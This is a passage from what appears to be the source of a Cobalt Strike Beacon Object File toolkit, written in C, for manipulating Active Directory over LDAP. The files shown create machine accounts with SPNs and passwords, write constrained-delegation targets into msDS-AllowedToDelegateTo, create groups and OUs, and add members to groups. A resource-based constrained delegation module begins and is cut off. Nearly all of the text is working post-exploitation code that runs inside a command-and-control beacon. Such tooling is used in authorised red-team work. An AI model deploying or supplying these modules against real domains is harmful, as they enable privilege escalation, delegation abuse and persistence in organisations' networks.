                dcPtr++;
            }
        } else {
            dcPtr++;
        }
    }
    domainName[domainPos] = '\0';
    
    // Build computer DN and extract computername
    char computerDN[512];
    char computername[256];
    
    if (isComputerDN) {
        // Use provided DN directly
        MSVCRT$_snprintf(computerDN, sizeof(computerDN), "%s", computerIdentifier);
        
        // Extract CN from DN for sAMAccountName
        char* cnStart = MSVCRT$strstr(computerIdentifier, "CN=");
        if (cnStart) {
            cnStart += 3; // Skip "CN="
            char* cnEnd = MSVCRT$strstr(cnStart, ",");
            if (cnEnd) {
                int cnLen = cnEnd - cnStart;
                if (cnLen > 0 && cnLen < 256) {
                    MSVCRT$memcpy(computername, cnStart, cnLen);
                    computername[cnLen] = '\0';
                } else {
                    MSVCRT$strcpy(computername, cnStart);
                }
            } else {
                MSVCRT$strcpy(computername, cnStart);
            }
        } else {
            // Fallback: use the entire identifier as computername
            MSVCRT$strcpy(computername, computerIdentifier);
        }
    } else {
        // Build DN using provided OU path or default Computers container
        MSVCRT$strcpy(computername, computerIdentifier);
        
        if (ouPath && MSVCRT$strlen(ouPath) > 0) {
            // Use provided OU path
            MSVCRT$_snprintf(computerDN, sizeof(computerDN), "CN=%s,%s", computername, ouPath);
        } else {
            // Use default Computers container
            MSVCRT$_snprintf(computerDN, sizeof(computerDN), "CN=%s,CN=Computers,%s", computername, defaultNC);
        }
    }
    
    // Build sAMAccountName (with $)
    char samAccountName[256];
    MSVCRT$_snprintf(samAccountName, sizeof(samAccountName), "%s$", computername);
    
    // Build dnsHostName
    char dnsHostName[512];
    MSVCRT$_snprintf(dnsHostName, sizeof(dnsHostName), "%s.%s", computername, domainName);
    
    // Build default SPNs
    char spn1[256], spn2[256], spn3[256], spn4[256];
    MSVCRT$_snprintf(spn1, sizeof(spn1), "HOST/%s", computername);
    MSVCRT$_snprintf(spn2, sizeof(spn2), "HOST/%s.%s", computername, domainName);
    MSVCRT$_snprintf(spn3, sizeof(spn3), "RestrictedKrbHost/%s", computername);
    MSVCRT$_snprintf(spn4, sizeof(spn4), "RestrictedKrbHost/%s.%s", computername, domainName);
    
    // Prepare attributes
    char* objectClass_values[] = { "top", "person", "organizationalPerson", "user", "computer", NULL };
    LDAPModA objectClass_mod = { LDAP_MOD_ADD, "objectClass", { .modv_strvals = objectClass_values } };
    
    char* sam_values[] = { samAccountName, NULL };
    LDAPModA sam_mod = { LDAP_MOD_ADD, "sAMAccountName", { .modv_strvals = sam_values } };
    
    char* dnsHostName_values[] = { dnsHostName, NULL };
    LDAPModA dnsHostName_mod = { LDAP_MOD_ADD, "dNSHostName", { .modv_strvals = dnsHostName_values } };
    
    char* spn_values[] = { spn1, spn2, spn3, spn4, NULL };
    LDAPModA spn_mod = { LDAP_MOD_ADD, "servicePrincipalName", { .modv_strvals = spn_values } };
    
    // userAccountControl: 4096 = WORKSTATION_TRUST_ACCOUNT (enabled)
    //                     4098 = WORKSTATION_TRUST_ACCOUNT | ACCOUNTDISABLE (disabled)
    char* uac_values[] = { disabled ? "4098" : "4096", NULL };
    LDAPModA uac_mod = { LDAP_MOD_ADD, "userAccountControl", { .modv_strvals = uac_values } };
    
    // Password attribute (if provided)
    LDAPModA password_mod;
    BERVAL* encodedPassword = NULL;
    BERVAL* password_bervals[2] = { NULL, NULL };
    
    if (password && MSVCRT$strlen(password) > 0) {
        encodedPassword = EncodePassword(password);
        if (encodedPassword) {
            password_bervals[0] = encodedPassword;
            password_mod.mod_op = LDAP_MOD_ADD | LDAP_MOD_BVALUES;
            password_mod.mod_type = "unicodePwd";
            password_mod.mod_vals.modv_bvals = password_bervals;
        } else {
            BeaconPrintf(CALLBACK_ERROR, "[!] Failed to encode password, continuing without password");
        }
    }
    
    // Array of attribute modifications
    LDAPModA* attrs[9];
    int attrCount = 0;
    attrs[attrCount++] = &objectClass_mod;
    attrs[attrCount++] = &sam_mod;
    attrs[attrCount++] = &dnsHostName_mod;
    attrs[attrCount++] = &spn_mod;
    attrs[attrCount++] = &uac_mod;
    if (encodedPassword) {
        attrs[attrCount++] = &password_mod;
    }
    attrs[attrCount] = NULL;
    
    // Add computer
    ULONG result = WLDAP32$ldap_add_s(ld, computerDN, attrs);
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully created computer '%s'", computername);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] DN: %s", computerDN);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] sAMAccountName: %s", samAccountName);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] dnsHostName: %s", dnsHostName);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] SPNs: HOST/%s, HOST/%s, RestrictedKrbHost/%s, RestrictedKrbHost/%s", 
                     computername, dnsHostName, computername, dnsHostName);
        if (encodedPassword) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Password: Set successfully");
        }
        if (disabled) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Account Status: DISABLED");
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create computer");
        PrintLdapError("Add computer", result);
        if (result == LDAP_ALREADY_EXISTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Computer already exists");
        } else if (result == LDAP_INSUFFICIENT_RIGHTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions");
        } else if (result == LDAP_INVALID_DN_SYNTAX) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Invalid DN syntax");
        } else if (result == LDAP_NO_SUCH_OBJECT) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Target OU does not exist");
        }
    }
    
    // Cleanup
    if (encodedPassword) {
        MSVCRT$free(encodedPassword->bv_val);
        MSVCRT$free(encodedPassword);
    }
    MSVCRT$free(defaultNC);
    MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-delegation.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, spn, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* spn = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!spn || MSVCRT$strlen(spn) == 0) {
        return;
    }


    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Add delegation SPN to msDS-AllowedToDelegateTo
    char* spn_values[] = { spn, NULL };
    LDAPModA spn_mod;
    spn_mod.mod_op = LDAP_MOD_ADD;
    spn_mod.mod_type = "msDS-AllowedToDelegateTo";
    spn_mod.mod_vals.modv_strvals = spn_values;

    LDAPModA* mods[] = { &spn_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully added delegation SPN '%s'", spn);
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Note: Ensure TRUSTED_TO_AUTH_FOR_DELEGATION UAC flag is set for constrained delegation");
    } else if (result == LDAP_ATTRIBUTE_OR_VALUE_EXISTS) {
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to add delegation SPN");
        PrintLdapError("Add delegation", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-group.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

// Group type constants
#define GROUP_TYPE_SECURITY_GLOBAL      -2147483646
#define GROUP_TYPE_SECURITY_DOMAIN_LOCAL -2147483644
#define GROUP_TYPE_SECURITY_UNIVERSAL   -2147483640
#define GROUP_TYPE_DIST_GLOBAL          2
#define GROUP_TYPE_DIST_DOMAIN_LOCAL    4
#define GROUP_TYPE_DIST_UNIVERSAL       8

int GetGroupType(const char* typeStr, const char* scopeStr) {
    int isSecurity = 1;
    if (typeStr && MSVCRT$strlen(typeStr) > 0) {
        if (MSVCRT$strcmp(typeStr, "distribution") == 0 || MSVCRT$strcmp(typeStr, "dist") == 0) {
            isSecurity = 0;
        }
    }
    
    if (scopeStr && MSVCRT$strlen(scopeStr) > 0) {
        if (MSVCRT$strcmp(scopeStr, "domainlocal") == 0 || MSVCRT$strcmp(scopeStr, "local") == 0) {
            return isSecurity ? GROUP_TYPE_SECURITY_DOMAIN_LOCAL : GROUP_TYPE_DIST_DOMAIN_LOCAL;
        } else if (MSVCRT$strcmp(scopeStr, "universal") == 0) {
            return isSecurity ? GROUP_TYPE_SECURITY_UNIVERSAL : GROUP_TYPE_DIST_UNIVERSAL;
        }
    }
    
    return isSecurity ? GROUP_TYPE_SECURITY_GLOBAL : GROUP_TYPE_DIST_GLOBAL;
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: groupname_or_dn, description, type, scope, ou_path, dc_address, use_ldaps
    char* groupIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isGroupDN = BeaconDataInt(&parser);
    char* description = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* type = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* scope = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* ouPath = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!groupIdentifier || MSVCRT$strlen(groupIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Group name or DN is required");
        return;
    }
    
    int groupType = GetGroupType(type, scope);
    
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Group identifier: %s %s", groupIdentifier, isGroupDN ? "(DN)" : "(name)");
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Group Type: %d", groupType);
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context - will build from hostname if possible
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }
    
    // Build group DN and extract groupname
    char groupDN[512];
    char groupname[256];
    
    if (isGroupDN) {
        // Use provided DN directly
        MSVCRT$_snprintf(groupDN, sizeof(groupDN), "%s", groupIdentifier);
        
        // Extract CN from DN for sAMAccountName
        char* cnStart = MSVCRT$strstr(groupIdentifier, "CN=");
        if (cnStart) {
            cnStart += 3; // Skip "CN="
            char* cnEnd = MSVCRT$strstr(cnStart, ",");
            if (cnEnd) {
                int cnLen = cnEnd - cnStart;
                if (cnLen > 0 && cnLen < 256) {
                    MSVCRT$memcpy(groupname, cnStart, cnLen);
                    groupname[cnLen] = '\0';
                } else {
                    MSVCRT$strcpy(groupname, cnStart);
                }
            } else {
                MSVCRT$strcpy(groupname, cnStart);
            }
        } else {
            // Fallback: use the entire identifier as groupname
            MSVCRT$strcpy(groupname, groupIdentifier);
        }
    } else {
        // Build DN using provided OU path or default Users container
        MSVCRT$strcpy(groupname, groupIdentifier);
        
        if (ouPath && MSVCRT$strlen(ouPath) > 0) {
            // Use provided OU path
            MSVCRT$_snprintf(groupDN, sizeof(groupDN), "CN=%s,%s", groupname, ouPath);
        } else {
            // Use default Users container
            MSVCRT$_snprintf(groupDN, sizeof(groupDN), "CN=%s,CN=Users,%s", groupname, defaultNC);
        }
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[*] sAMAccountName: %s", groupname);
    
    // Convert group type to string
    char groupTypeStr[20];
    MSVCRT$_snprintf(groupTypeStr, sizeof(groupTypeStr), "%d", groupType);
    
    // Prepare attributes
    char* objectClass_values[] = { "top", "group", NULL };
    LDAPModA objectClass_mod = { LDAP_MOD_ADD, "objectClass", { .modv_strvals = objectClass_values } };
    
    char* cn_values[] = { groupname, NULL };
    LDAPModA cn_mod = { LDAP_MOD_ADD, "cn", { .modv_strvals = cn_values } };
    
    char* sam_values[] = { groupname, NULL };
    LDAPModA sam_mod = { LDAP_MOD_ADD, "sAMAccountName", { .modv_strvals = sam_values } };
    
    char* groupType_values[] = { groupTypeStr, NULL };
    LDAPModA groupType_mod = { LDAP_MOD_ADD, "groupType", { .modv_strvals = groupType_values } };
    
    LDAPModA desc_mod;
    LDAPModA* attrs[6];
    int attrCount = 0;
    attrs[attrCount++] = &objectClass_mod;
    attrs[attrCount++] = &cn_mod;
    attrs[attrCount++] = &sam_mod;
    attrs[attrCount++] = &groupType_mod;
    
    if (description && MSVCRT$strlen(description) > 0) {
        char* desc_values[] = { description, NULL };
        desc_mod.mod_op = LDAP_MOD_ADD;
        desc_mod.mod_type = "description";
        desc_mod.mod_vals.modv_strvals = desc_values;
        attrs[attrCount++] = &desc_mod;
    }
    
    attrs[attrCount] = NULL;
    
    // Add group
    ULONG result = WLDAP32$ldap_add_s(ld, groupDN, attrs);
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully created group '%s'", groupname);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] DN: %s", groupDN);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] sAMAccountName: %s", groupname);
        
        // Print group type details
        const char* typeDesc = "Unknown";
        switch(groupType) {
            case GROUP_TYPE_SECURITY_GLOBAL:
                typeDesc = "Security - Global";
                break;
            case GROUP_TYPE_SECURITY_DOMAIN_LOCAL:
                typeDesc = "Security - Domain Local";
                break;
            case GROUP_TYPE_SECURITY_UNIVERSAL:
                typeDesc = "Security - Universal";
                break;
            case GROUP_TYPE_DIST_GLOBAL:
                typeDesc = "Distribution - Global";
                break;
            case GROUP_TYPE_DIST_DOMAIN_LOCAL:
                typeDesc = "Distribution - Domain Local";
                break;
            case GROUP_TYPE_DIST_UNIVERSAL:
                typeDesc = "Distribution - Universal";
                break;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Group Type: %s (%d)", typeDesc, groupType);
        
        if (description && MSVCRT$strlen(description) > 0) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Description: %s", description);
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create group");
        PrintLdapError("Add group", result);
        if (result == LDAP_ALREADY_EXISTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Group already exists");
        } else if (result == LDAP_INSUFFICIENT_RIGHTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions");
        } else if (result == LDAP_INVALID_DN_SYNTAX) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Invalid DN syntax");
        } else if (result == LDAP_NO_SUCH_OBJECT) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Target OU does not exist");
        }
    }
    
    // Cleanup
    MSVCRT$free(defaultNC);
    MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-groupmember.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: group_identifier, is_group_dn, member_identifier, is_member_dn, 
    // search_ou, dc_address, use_ldaps
    char* groupIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isGroupDN = BeaconDataInt(&parser);
    char* memberIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isMemberDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!memberIdentifier || MSVCRT$strlen(memberIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Member identifier is required");
        return;
    }
    
    if (!groupIdentifier || MSVCRT$strlen(groupIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Group identifier is required");
        return;
    }
    
    
    if (searchOu && MSVCRT$strlen(searchOu) > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Search OU: %s", searchOu);
    }
    
    if (dcAddress && MSVCRT$strlen(dcAddress) > 0) {
    }
    
    if (useLdaps) {
    }
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context (needed for searches if DN not provided)
    char* defaultNC = NULL;
    char* memberDN = NULL;
    char* groupDN = NULL;
    
    if (!isMemberDN || !isGroupDN) {
        
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve member DN
    if (isMemberDN) {
        // Member identifier is already a DN
        size_t len = MSVCRT$strlen(memberIdentifier) + 1;
        memberDN = (char*)MSVCRT$malloc(len);
        if (memberDN) {
            MSVCRT$strcpy(memberDN, memberIdentifier);
        }
    } else {
        // Search for member by sAMAccountName
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        memberDN = FindObjectDN(ld, memberIdentifier, searchBase);
        
        if (!memberDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve member DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Member '%s' not found", memberIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            CleanupLDAP(ld);
            return;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Member DN: %s", memberDN);
    }
    
    // Resolve group DN
    if (isGroupDN) {
        // Group identifier is already a DN
        size_t len = MSVCRT$strlen(groupIdentifier) + 1;
        groupDN = (char*)MSVCRT$malloc(len);
        if (groupDN) {
            MSVCRT$strcpy(groupDN, groupIdentifier);
        }
    } else {
        // Search for group by sAMAccountName
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        groupDN = FindObjectDN(ld, groupIdentifier, searchBase);
        
        if (!groupDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve group DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Group '%s' not found", groupIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            MSVCRT$free(memberDN);
            CleanupLDAP(ld);
            return;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Group DN: %s", groupDN);
    }
    
    // Prepare LDAP modification to add member
    char* member_values[] = { memberDN, NULL };
    LDAPModA member_mod;
    member_mod.mod_op = LDAP_MOD_ADD;
    member_mod.mod_type = "member";
    member_mod.mod_vals.modv_strvals = member_values;
    
    LDAPModA* mods[] = { &member_mod, NULL };
    
    // Apply the modification
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Adding member to group...");
    ULONG result = WLDAP32$ldap_modify_s(ld, groupDN, mods);
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully added member to group");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Member DN: %s", memberDN);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Group DN: %s", groupDN);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to add member to group");
        PrintLdapError("Modify group", result);
        
        // Provide helpful hints
        if (result == LDAP_ALREADY_EXISTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Member is already in the group");
        } else if (result == LDAP_INSUFFICIENT_RIGHTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions to modify group membership");
        } else if (result == LDAP_NO_SUCH_OBJECT) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Group or member object does not exist");
        } else if (result == LDAP_INVALID_DN_SYNTAX) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Invalid DN syntax");
        }
    }
    
    // Cleanup
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    if (memberDN) MSVCRT$free(memberDN);
    if (groupDN) MSVCRT$free(groupDN);
    CleanupLDAP(ld);
    
}

================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-ou.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: ou_name_or_dn, is_dn, description, parent_ou, dc_address, use_ldaps
    char* ouIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isOuDN = BeaconDataInt(&parser);
    char* description = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* parentOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!ouIdentifier || MSVCRT$strlen(ouIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] OU name or DN is required");
        return;
    }
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context - will build from hostname if possible
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }
    
    // Build OU DN
    char ouDN[512];
    char ouName[256];
    
    if (isOuDN) {
        // Use provided DN directly
        MSVCRT$_snprintf(ouDN, sizeof(ouDN), "%s", ouIdentifier);
        
        // Extract OU name from DN for display
        char* ouStart = MSVCRT$strstr(ouIdentifier, "OU=");
        if (ouStart) {
            ouStart += 3; // Skip "OU="
            char* ouEnd = MSVCRT$strstr(ouStart, ",");
            if (ouEnd) {
                int ouLen = ouEnd - ouStart;
                if (ouLen > 0 && ouLen < 256) {
                    MSVCRT$memcpy(ouName, ouStart, ouLen);
                    ouName[ouLen] = '\0';
                } else {
                    MSVCRT$strcpy(ouName, ouStart);
                }
            } else {
                MSVCRT$strcpy(ouName, ouStart);
            }
        } else {
            // Fallback: use the entire identifier as name
            MSVCRT$strcpy(ouName, ouIdentifier);
        }
    } else {
        // Build DN using provided OU name and parent OU or default NC
        MSVCRT$strcpy(ouName, ouIdentifier);
        
        if (parentOu && MSVCRT$strlen(parentOu) > 0) {
            // Use provided parent OU
            MSVCRT$_snprintf(ouDN, sizeof(ouDN), "OU=%s,%s", ouName, parentOu);
        } else {
            // Use domain root as parent
            MSVCRT$_snprintf(ouDN, sizeof(ouDN), "OU=%s,%s", ouName, defaultNC);
        }
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[*] OU name: %s", ouName);
    
    // Prepare attributes for OU creation
    char* objectClass_values[] = { "top", "organizationalUnit", NULL };
    LDAPModA objectClass_mod = { LDAP_MOD_ADD, "objectClass", { .modv_strvals = objectClass_values } };
    
    char* ou_values[] = { ouName, NULL };
    LDAPModA ou_mod = { LDAP_MOD_ADD, "ou", { .modv_strvals = ou_values } };
    
    // Optional description attribute
    LDAPModA description_mod;
    char* description_values[2] = { NULL, NULL };
    
    int attrCount = 2; // objectClass and ou
    LDAPModA* attrs[4]; // objectClass, ou, optional description, NULL
    
    attrs[0] = &objectClass_mod;
    attrs[1] = &ou_mod;
    
    if (description && MSVCRT$strlen(description) > 0) {
        description_values[0] = description;
        description_mod.mod_op = LDAP_MOD_ADD;
        description_mod.mod_type = "description";
        description_mod.mod_vals.modv_strvals = description_values;
        attrs[attrCount++] = &description_mod;
    }
    
    attrs[attrCount] = NULL;
    
    // Create the OU
    ULONG result = WLDAP32$ldap_add_s(ld, ouDN, attrs);
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully created OU!");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] OU Name: %s", ouName);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] DN: %s", ouDN);
        
        if (description && MSVCRT$strlen(description) > 0) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Description: %s", description);
        }
        
        BeaconPrintf(CALLBACK_OUTPUT, "");
        BeaconPrintf(CALLBACK_OUTPUT, "[*] The OU can now be used to organize objects:");
        BeaconPrintf(CALLBACK_OUTPUT, "[*]   ldap add-user username password -ou \"%s\"", ouDN);
        BeaconPrintf(CALLBACK_OUTPUT, "[*]   ldap add-computer computername -ou \"%s\"", ouDN);
        BeaconPrintf(CALLBACK_OUTPUT, "[*]   ldap move-object object \"%s\"", ouDN);
        
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create OU");
        PrintLdapError("Create OU", result);
        
        if (result == LDAP_ALREADY_EXISTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] OU already exists at this location");
            BeaconPrintf(CALLBACK_ERROR, "[!] DN: %s", ouDN);
        } else if (result == LDAP_INSUFFICIENT_RIGHTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions to create OU");
            BeaconPrintf(CALLBACK_ERROR, "[!] Required permission: Create Organizational Unit objects");
        } else if (result == LDAP_INVALID_DN_SYNTAX) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Invalid DN syntax");
            if (parentOu && MSVCRT$strlen(parentOu) > 0) {
                BeaconPrintf(CALLBACK_ERROR, "[!] Check parent OU format: %s", parentOu);
            }
        } else if (result == LDAP_NO_SUCH_OBJECT) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Parent container does not exist");
            if (parentOu && MSVCRT$strlen(parentOu) > 0) {
                BeaconPrintf(CALLBACK_ERROR, "[!] Parent OU: %s", parentOu);
            } else {
                BeaconPrintf(CALLBACK_ERROR, "[!] Domain root: %s", defaultNC);
            }
        } else if (result == LDAP_CONSTRAINT_VIOLATION) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Constraint violation");
            BeaconPrintf(CALLBACK_ERROR, "[!] Possible causes:");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - OU name contains invalid characters");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - Parent container doesn't accept OUs");
        } else if (result == LDAP_OBJECT_CLASS_VIOLATION) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Object class violation");
            BeaconPrintf(CALLBACK_ERROR, "[!] Parent container may not accept organizational units");
        }
    }
    
    // Cleanup
    MSVCRT$free(defaultNC);
    MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-rbcd.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"
#include "acl_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments:
    // target_identifier, is_target_dn, principal_identifier, is_principal_dn,
    // access_mask (optional - defaults to GenericAll), ace_type (optional),
    // search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* principalIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isPrincipalDN = BeaconDataInt(&parser);
    // char* accessMaskStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    // char* aceTypeStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!principalIdentifier || MSVCRT$strlen(principalIdentifier) == 0) {
